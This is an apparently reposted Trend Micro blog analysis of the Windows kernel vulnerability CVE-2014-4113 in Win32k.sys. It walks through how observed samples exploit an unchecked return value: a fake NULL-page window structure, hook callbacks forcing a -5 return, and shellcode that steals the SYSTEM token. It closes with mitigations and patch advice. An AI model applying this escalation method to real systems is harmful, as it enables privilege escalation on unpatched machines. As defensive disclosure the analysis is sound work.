Stuxnet which employed CVE-2010-2743 (also in Win32k.sys) to EoP after using other exploit to infect system. The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes: 70857e02d60c66e27a173f8f292774f1 f9f01ce747679b82723b989d01c4d927 We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems. Everything you need to know about the Win32k.sys vulnerability Win32k.sys is responsible for window management, and any GUI process/thread that will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys. Let’s take a closer look on the vulnerability being exploited. The essential problem is the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk. In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of win32k!tagWND structure or error code -1, -5. Another function xxxHandleMenuMessages() will call it and use its return value as parameter of xxxSendMessage(). Below is the pseudo code: xxxHandleMenuMessages() { tagWnd* pWnd = xxxMNFindWindowFromPoint(…); … //without checking if the return value is a valid address xxxSendMessage(pwnd,…); } Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will see how the sample exploits this vulnerability in kernel-mode in the next section. Below are the key steps or description on how the exploit occurs: Map a prepared memory section to NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure. Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() to be -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code. Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code. Create a child process with SYSTEM privileges of the assigned program The sample uses SetWindowsHookEx () to control xxxMNFindWindowFromPoint() to return -5: Create a window and 2-level popup menu. Hook that window’s wndproc call. Track popup menu on the window and enter hook callback. In the hook callback, it changes wndproc of the menu to another callback. In menu’s callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX) Lead to xxxMNFindWindowFromPoint() on the destroyed menu return -5 Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets EPROCESS of SYSTEM process (PID=4), and copies its privilege token to EPROCESS of current process. Figure 1. Code snippet of the sample From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, is easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable. With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public. During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploits variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerability to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods become more prevalent, we may see more similar kernel zero-day vulnerabilities in the future. Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date. Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode. As such, the access to null page and shell code will not lead to code execution, although it will lead to crashes. Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles: Sandworm to Blacken: The SCADA Connection An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm” MS Zero-Day Used in Attacks Against European Sectors, Industries Sursa: An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) | Security Intelligence Blog | Trend Micro